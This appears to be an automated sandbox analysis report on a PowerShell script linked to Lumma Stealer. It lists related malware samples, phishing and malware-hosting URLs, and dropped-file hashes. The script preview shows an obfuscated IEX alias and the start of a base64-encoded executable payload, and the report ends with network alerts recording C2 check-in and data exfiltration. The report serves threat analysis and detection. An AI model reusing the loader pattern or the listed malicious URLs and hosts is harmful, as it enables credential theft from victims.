 | random.exe | malicious | LummaC Stealer | 172.67.149.66
 | UK6dGWkIJK.exe | malicious | LummaC Stealer | 104.21.29.142
 | gQE0KK1bN8.exe | malicious | LummaC Stealer, PureLog Stealer | 104.21.29.142
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://click.cncemail.com/?qs=86f18f341c8c61df032f6c6c3cd614329c279ad56f8485ea453927ea8982eef94ab805237cc279d2bd164feb46dbf1a941f6590cf1e59115 | malicious | Unknown | 104.19.171.40
 | https://b1ds.gameorld.ru/o365-login-auth/ | malicious | Unknown | 104.21.2.8
 | https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw== | malicious | Unknown | 188.114.97.3
 | RFQ098765345678.exe | malicious | DarkTortilla, FormBook | 104.21.48.1
 | https://drive.google.com/uc?export=download&id=1B8xr-NcyL1YnEEEgHxEPTw0fs4rDtuEf | malicious | Unknown | 104.18.187.31
 | Scan_Documents_Request_PO.3748-00090127002025_specification_sample_catalogs.bat | malicious | Remcos | 104.20.4.235
 | VESSELS DOCUMENTS.exe | malicious | MassLogger RAT | 104.21.112.1
 | e2j0xn.ps1 | malicious | FormBook | 172.67.179.56
 | New purchase order.jse | malicious | FormBook | 172.67.179.56
 | calculating.vbs | malicious | Remcos | 104.20.4.235
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | h226x41CQ6.exe | malicious | LummaC | 104.21.29.142
 | QuxHx2gOLI.exe | malicious | SmokeLoader | 104.21.29.142
 | New v2.2.0.exe | malicious | LummaC Stealer | 104.21.29.142
 | Installer.exe | malicious | LummaC Stealer, PureLog Stealer | 104.21.29.142
 | A_acid11.exe | malicious | LummaC Stealer | 104.21.29.142
 | Loader.exe | malicious | LummaC Stealer, PureLog Stealer | 104.21.29.142
 | 4JPKDcwtDo.exe | malicious | LummaC Stealer | 104.21.29.142
 | p199AjsEFs.exe | malicious | Amadey, LummaC Stealer, Stealc | 104.21.29.142
 | VbEfsnL4cp.exe | malicious | LummaC Stealer | 104.21.29.142
 | 2E02vIiMfd.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | 104.21.29.142
                                                                          No context
                                                                          Process:C:\Windows\System32\wermgr.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):65536
                                                                          Entropy (8bit):0.531881926582401
                                                                          Encrypted:false
                                                                          SSDEEP:96:yAF4jj5rxYidNRH3Uje0e35/3oo7p1QXIGZAX/d5FMT2SlPkpXmTAcf/VXT5NHBx:3slmGNR30mYAzuiFqZ24lO8
                                                                          MD5:254F9C40983BBF66DD4D599441E34E87
                                                                          SHA1:EFD13C2E406DC83D1172E64EFE01A732C7183D10
                                                                          SHA-256:41AEA0CA1960C23C0F124BA4665E9C70A02C1F1A9CF8AF130920413D2931DD10
                                                                          SHA-512:E52D9AEAA4BD094E8A3D712D18EE802ABCBC07D2CA3B50A6077F9DDE4EB66270162E63D0F07BE7761C99BAAC2F5287AAD92CB35C3C78D3208404F1CB19D7F05F
                                                                          Malicious:false
                                                                          Reputation:low
Preview (UTF-16 text, shown decoded):
Version=1
EventType=PowerShell
EventTime=133824635282341945
ReportType=1
Consent=1
UploadTime=133824634994020954
ReportStatus=524384
ReportIdentifier=2441301a-a88e-4ffa-b493-33cdec7a9371
Wow64Host=34404
OriginalFilename=PowerShell.EXE
AppSessionGuid=00001e88-0001-0014-bb9f-d7e4cb70db01
TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000f43d9bb316e30ae1a3494ac5b0624f6bea1bf054!powershell.exe
TargetAppVer=2037//06//10:07:45:25!7d6da!powershell.exe
BootId=4294967295
Targe
                                                                          Process:C:\Windows\System32\wermgr.exe
                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):7284
                                                                          Entropy (8bit):3.735348400968557
                                                                          Encrypted:false
                                                                          SSDEEP:96:RSIU6o7wVetb4jQEXq6YkY7aULDEgmfHNpXErZn55aMWpm:R6l7wVeJ4jrq6YNa+DEgmftEZpWpm
                                                                          MD5:46D4987B77988FD35469EAF38B1683C2
                                                                          SHA1:62817AF8ED50F7CC9CC27A349011C0CB97D0C61F
                                                                          SHA-256:44A67B725D52B31E236227589FE66B76EB6335F0D01ABCF78851FF4F346D4353
                                                                          SHA-512:6497CF8A4B7BF3DD06C72C9FFDFE80478A33507F8DA650A1159058F377D066F5DE437A8E8DB7221E9EC7083DBDB798E1A7B59AAFA03A0C14668B50F938073F45
                                                                          Malicious:false
                                                                          Reputation:low
Preview (UTF-16 text, shown decoded):
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
  <OSVersionInformation>
    <WindowsNTVersion>10.0</WindowsNTVersion>
    <Build>19045</Build>
    <Product>(0x30): Windows 10 Pro</Product>
    <Edition>Professional</Edition>
    <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
    <Revision>2006</Revision>
    <Flavor>Multiprocessor Free</Flavor>
    <Architecture>X64</Architecture>
    <LCID>2057</LCID>
  </OSVersionInformation>
  <ProcessInformation>
    <Pid>7816</Pi
                                                                          Process:C:\Windows\System32\wermgr.exe
                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4905
                                                                          Entropy (8bit):4.691974150507306
                                                                          Encrypted:false
                                                                          SSDEEP:96:uIjfKI7GP7VNJFKloFMMFl9wWTzFMMF0ufsd:uIeYGP7Z4cfcufS
                                                                          MD5:781FB32B23CED1AD8BC4BF07F91E6B8E
                                                                          SHA1:C3688E35C5DA6BB1F07FE6744C56000CFD52A09C
                                                                          SHA-256:60FE7022A6DF9A06CC5C405AC1CAE25555DF3DB7635A30953C2836406FEA92E2
                                                                          SHA-512:188E8C5FF577259975BE42CB3996A68B58876E2AD976BFA367F81D6EAF4CEAB578668A2A0324209FEFAA1BF19B66A3CDA726F1F999C1FE7F826EC1E924A1884F
                                                                          Malicious:false
                                                                          Reputation:low
Preview:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<req ver="2">
 <tlm>
 <src>
 <desc>
 <mach>
 <os>
 <arg nm="vermaj" val="10" />
 <arg nm="vermin" val="0" />
 <arg nm="verbld" val="19045" />
 <arg nm="vercsdbld" val="2006" />
 <arg nm="verqfe" val="2006" />
 <arg nm="csdbld" val="2006" />
 <arg nm="versp" val="0" />
 <arg nm="arch" val="9" />
 <arg nm="lcid" val="2057" />
 <arg nm="geoid" val="223" />
 <arg nm="sku" val="48" />
 <arg nm="domain" val="0" />
 <arg nm="prodsuite" val="256" />
 <arg nm="ntprodtype" val="1" />
 <arg nm="platid" val="2" />
 <arg nm="tmsi" val="694441" />
 <arg nm="osinsty" val="1" />
 <arg nm="iever" val="11.789.19041.0-11.0.1000" />
 <arg nm="portos" val="0" />
 <arg nm="ram" val="409
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.890472898059848
                                                                          Encrypted:false
                                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1628158735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                                          MD5:3A925CB766CE4286E251C26E90B55CE8
                                                                          SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                                          SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                                          SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6225
                                                                          Entropy (8bit):3.736108937771384
                                                                          Encrypted:false
                                                                          SSDEEP:96:Vw6knSlICErtkvhkvCCtplMrYhLHwlMrYhAHo:Vw6kaElrMvM8
                                                                          MD5:0F1D7D03A39B7AB28C7E2C75F3CF8332
                                                                          SHA1:70761CBE65B6EFC0347E759757688C3C84CB0C3F
                                                                          SHA-256:719E6E5D609FE1216E2F5277CA00B7D573F26EF6B14EE01DF400C3661AA6E61A
                                                                          SHA-512:BC59A8FD74D86C60863964CF60D167D1FBB1AA52700E2DCAC06AB3D3CE471FE5567BA4307E2D1D1AF10B2B58979DEEF75C044789EED62762E033D7060A1BCDD1
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. .....*_........p..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...u....p...F...p......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=;ZGw..........................3*N.A.p.p.D.a.t.a...B.V.1.....;ZDw..Roaming.@......EW.=;ZDw..........................-0..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=;ZBw..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=;ZBw..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=;ZBw....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=;ZBw....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=;ZHw....9...........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6225
                                                                          Entropy (8bit):3.736108937771384
                                                                          Encrypted:false
                                                                          SSDEEP:96:Vw6knSlICErtkvhkvCCtplMrYhLHwlMrYhAHo:Vw6kaElrMvM8
                                                                          MD5:0F1D7D03A39B7AB28C7E2C75F3CF8332
                                                                          SHA1:70761CBE65B6EFC0347E759757688C3C84CB0C3F
                                                                          SHA-256:719E6E5D609FE1216E2F5277CA00B7D573F26EF6B14EE01DF400C3661AA6E61A
                                                                          SHA-512:BC59A8FD74D86C60863964CF60D167D1FBB1AA52700E2DCAC06AB3D3CE471FE5567BA4307E2D1D1AF10B2B58979DEEF75C044789EED62762E033D7060A1BCDD1
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. .....*_........p..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...u....p...F...p......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=;ZGw..........................3*N.A.p.p.D.a.t.a...B.V.1.....;ZDw..Roaming.@......EW.=;ZDw..........................-0..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=;ZBw..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=;ZBw..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=;ZBw....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=;ZBw....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=;ZHw....9...........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                          Category:dropped
                                                                          Size (bytes):1835008
                                                                          Entropy (8bit):4.417449902710954
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Mcifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuN/5+:hi58NSWIZBk2MM6AFB1o
                                                                          MD5:B758660C24748E73B8A4D2EDCE9851CB
                                                                          SHA1:951DF3CE7AC9E6998523954A92130A4F6864C078
                                                                          SHA-256:D93D4925F9BAA62DB826125A4D95561817741B1457EBDDA2AD20B88464F9AF2C
                                                                          SHA-512:C3BA27F08D88CD16504B064A04F9F4B1FEB2DB8A3832AF95B4D1D127B235D81CBD05E74FFF03C5F60B25F652A6CCAD6C97BAD8C72837375A60693C4F28900FB7
                                                                          Malicious:false
                                                                          Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.G...p..............................................................................................................................................................................................................................................................................................................................................s..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          File type:ASCII text, with very long lines (65481), with CRLF line terminators
                                                                          Entropy (8bit):5.485284056284138
                                                                          TrID:
                                                                            File name:176.113.115.225.ps1
                                                                            File size:546'028 bytes
                                                                            MD5:eaf7ebe973ee32e26027ba74eb211b0c
                                                                            SHA1:29f2261e2a37e97045d000cc1bd0fb614cff9f74
                                                                            SHA256:97a191d90077f093ce6e0d472167b36bb648de846098ed494d981c1076d358f5
                                                                            SHA512:c35bd999fb35a1a28816622cdf743e5d2287b1a5933229d682ac0da1c96a91fc81dcdcd2daeac1e9dff79fc74f1c3af79e044037ff0318d13380addc7067b966
                                                                            SSDEEP:12288:ZcTOT1uStOOovc4mkab9NY+2GyKKIoKUOwFL9:ZcTPStkvcVZT2GyQoKUOwFL9
                                                                            TLSH:E3C48D3141437D5E3F9A2ECA6400ADC10C8D3D97B614D584AE8A4276B2BE23B5F6D9FC
                                                                            File Content Preview:.... $t0='JOOOOIEX'.replace('JOOOO','');sal GG $t0;....$OE="ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAFOelGcAAAAAAAAAAOAALiELATAAACABAAAkAQAAAAAAEj8BAAAgAAAAQAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAQA
                                                                            Icon Hash:3270d6baae77db44


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-27T15:58:20.506711+0100 | 2059421 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) | 1 | 192.168.2.7 | 61999 | 1.1.1.1 | 53 | UDP
2025-01-27T15:58:20.519335+0100 | 2059423 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) | 1 | 192.168.2.7 | 61168 | 1.1.1.1 | 53 | UDP
2025-01-27T15:58:21.067993+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:21.067993+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:21.593553+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:21.593553+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.192148+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.192148+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.688671+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.688671+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:23.347094+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:23.347094+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:24.082393+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:24.600432+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:24.600432+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:26.035507+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:26.035507+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:27.552936+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:27.552936+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:29.081608+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:29.081608+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:33.152602+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:33.152602+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:33.908893+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP
• Total Packets: 94
• 443 (HTTPS)
• 53 (DNS)

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 27, 2025 15:58:20.539253950 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:20.539282084 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:20.539356947 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:20.543554068 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:20.543572903 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:21.067914009 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:21.067992926 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.071176052 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.071191072 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:21.071506023 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:21.114439011 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.149066925 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.149100065 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.149195910 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:21.593539953 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:21.593928099 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:21.594022036 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.620739937 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.620769024 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:21.720988989 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.721041918 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:21.721170902 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.722193003 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:21.722214937 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.192080021 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.192147970 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.193454981 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.193464041 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.193810940 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.195167065 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.195183039 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.195255041 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.688731909 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.688798904 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.688849926 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.688864946 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.688879967 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.688918114 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.688930035 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.689243078 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.689281940 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.689292908 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.689306021 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.689359903 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.689368963 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.693701029 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.693736076 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.693777084 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.693793058 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.693835974 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.777348995 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.777446032 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.777488947 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.777506113 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.777528048 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.777578115 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.777585983 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.777601004 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.777653933 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.777806997 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.777818918 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.777844906 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.777851105 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7
Jan 27, 2025 15:58:22.867619991 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142
Jan 27, 2025 15:58:22.867643118 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7
